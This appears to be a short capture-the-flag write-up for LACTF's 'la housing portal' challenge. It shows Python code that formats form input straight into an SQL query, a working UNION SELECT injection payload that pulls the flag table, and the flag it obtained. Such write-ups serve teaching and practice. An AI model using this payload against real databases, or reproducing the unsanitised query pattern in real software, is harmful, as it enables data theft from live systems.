SQL Injection Retreive data on another Tables

2From LACTF "# la housing portal" :

serv.zip

#sqli
@everyone

bi0sCTF 2024 has officially started

"Welcome" to the game

Quick Identification

Pasted image 20240218222140.png
We know the sql payload didn't get sanitized

query = """
    select * from users where {} LIMIT 25;
    """.format(
        " AND ".join(["{} = '{}'".format(k, v) for k, v in prefs.items()])
    )

We can manipulate the k and the v because its from the requests form.

Payload

we can get the flag using UNION , here are the payload

' UNION SELECT 1,1,1,1,1,flag FROM flag where '

so the query full will be in the requests.post will be

name=any&guests=' UNION SELECT 1,1,1,1,1,flag FROM flag where '1

Quick explaination

so the query full will be

select * from users where name='any' AND guests='' UNION SELECT 1,1,1,1,1,flag FROM flag where '1'

Pasted image 20240218223259.png

The payload work.

Lets get Flag:
Pasted image 20240218223317.png

Obtained flag : lactf{us3_s4n1t1z3d_1npu7!!!}